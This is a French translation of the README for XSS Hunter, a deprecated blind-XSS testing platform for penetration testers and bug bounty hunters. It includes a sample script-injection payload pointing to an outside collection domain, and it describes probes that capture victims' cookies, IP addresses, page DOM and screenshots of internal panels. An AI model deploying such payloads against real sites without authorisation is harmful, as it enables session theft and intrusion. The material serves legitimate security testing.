DÉPRÉCIÉ - ESSAYEZ LA NOUVELLE VERSION EXPRESS
Voir ici pour plus d'infos : https://github.com/mandatoryprogrammer/xsshunter-express
Code source de XSS Hunter
Ceci est une version portable du code source qui fonctionne sur https://xsshunter.com. Il est conçu pour être facilement installable sur n'importe quel serveur pour les professionnels de la sécurité et les chasseurs de primes de bogues qui souhaitent tester les XSS de manière beaucoup plus puissante.
Si vous ne voulez pas configurer ce logiciel et préférez simplement commencer à tester, consultez https://xsshunter.com .
Prérequis
- Un serveur exécutant (de préférence) Ubuntu.
- Un compte Mailgun, pour envoyer des e-mails de déclenchement de payload XSS.
- Un nom de domaine, de préférence court pour réduire la taille des payloads. Voici un bon site pour trouver des noms de domaine à deux lettres : https://catechgory.com/. Mon domaine est xss.ht par exemple.
- Un certificat SSL wildcard, en voici un bon marché. Ceci est nécessaire car XSS Hunter identifie les utilisateurs en fonction de leurs sous-domaines et ils doivent tous être activés en SSL. Nous ne pouvons pas utiliser Let's Encrypt car ils ne prennent pas en charge les certificats wildcard. Je vais m'abstenir d'insulter le modèle économique des autorités de certification, mais soyez assuré que c'est très ridicule et qu'il leur en coûte très peu de vous délivrer un certificat wildcard, alors allez avec le fournisseur le moins cher que vous trouvez (tant qu'il est pris en charge par tous les navigateurs).
Configuration
Veuillez consulter https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ pour des informations sur la configuration de XSS Hunter sur votre propre serveur.
Résumé des fonctionnalités
Lors de votre inscription, vous créerez un domaine court spécial comme yoursubdomain.xss.ht qui identifie vos vulnérabilités XSS et héberge votre payload. Vous utilisez ensuite ce sous-domaine dans vos tests XSS, avec des tentatives d'injection comme "><script src=//yoursubdomain.xss.ht></script>. XSS Hunter servira automatiquement des sondes XSS et collectera les informations résultantes lorsqu'elles se déclenchent.
Fonctionnalités
- Gestion des déclenchements de payload XSS : Gérez tous vos payloads XSS dans le panneau de contrôle de votre compte XSS Hunter.
- Sondes XSS puissantes : Les informations suivantes sont collectées à chaque fois qu'une sonde se déclenche sur une page vulnérable :
- L'URI de la page vulnérable
- L'origine de l'exécution
- L'adresse IP de la victime
- Le référent de la page
- Le User Agent de la victime
- Tous les cookies non HTTP-Only
- Le DOM HTML complet de la page
- Capture d'écran complète de la page affectée
- Requête HTTP responsable (si un outil compatible XSS Hunter est utilisé)
- Captures d'écran pleine page : Les sondes XSS Hunter utilisent l'API canvas HTML5 pour générer une capture d'écran complète de la page vulnérable sur laquelle un payload XSS s'est déclenché. Avec cette fonctionnalité, vous pouvez jeter un coup d'œil dans les panneaux d'administration internes, les bureaux d'assistance, les systèmes de journalisation et autres applications web internes. Cela permet des rapports plus puissants montrant l'impact complet de la vulnérabilité à votre client ou programme de bug bounty.
- Génération de rapports Markdown : Chaque rapport de payload XSS est accompagné d'un rapport Markdown pré-généré. Ces rapports générés sont également compatibles avec d'autres plateformes supportant le Markdown, comme Phabricator, pour un signalement facile des bogues dans les systèmes de tickets de l'entreprise.
- Rapports par e-mail de déclenchement de payload XSS : Les déclenchements de payload XSS envoient également des rapports détaillés par e-mail qui peuvent être facilement transférés aux contacts de sécurité appropriés pour un signalement rapide des bogues critiques.
- Génération automatique de payload : XSS Hunter génère automatiquement des payloads XSS à utiliser dans vos tests de sécurité d'applications web.
- Injections corrélées : Peut-être la fonctionnalité la plus puissante de XSS Hunter est la capacité de corréler les tentatives d'injection avec les déclenchements de payload XSS. En utilisant un outil de test compatible XSS Hunter, vous pouvez savoir immédiatement ce qui a provoqué le déclenchement d'un payload spécifique (même des semaines après la tentative d'injection !).
- Option de chiffrement PGP pour les e-mails de payload : Paranoïaque supplémentaire ? Le chiffrement PGP côté client est disponible, chiffrant toutes les données d'injection dans le navigateur de la victime avant de les envoyer au service XSS Hunter.
- Récupération de pages : Lors du déclenchement de votre payload XSS, vous pouvez spécifier une liste de chemins relatifs que le payload doit récupérer et stocker automatiquement. Cela est utile pour trouver d'autres vulnérabilités comme de mauvaises politiques
crossdomain.xml sur des systèmes internes qui ne seraient normalement pas accessibles.
- Chargement de payload secondaire : Vous avez un payload secondaire à charger après que XSS Hunter a fait son travail ? XSS Hunter vous offre la possibilité de spécifier un payload JavaScript secondaire à exécuter une fois sa collecte terminée.
- Application web iOS : Il est également possible de visualiser vos déclenchements de payload XSS via une application web iOS. Il suffit de naviguer vers le chemin
/app et d'enregistrer la page en tant qu'application web sur l'écran d'accueil de votre iPhone.
Exploits notables
Envie de contribuer ?
Tout le code a été créé par moi et (pour cette raison) n'est probablement pas une bonne pratique et a absolument besoin d'optimisation/nettoyage. Toute pull request est appréciée !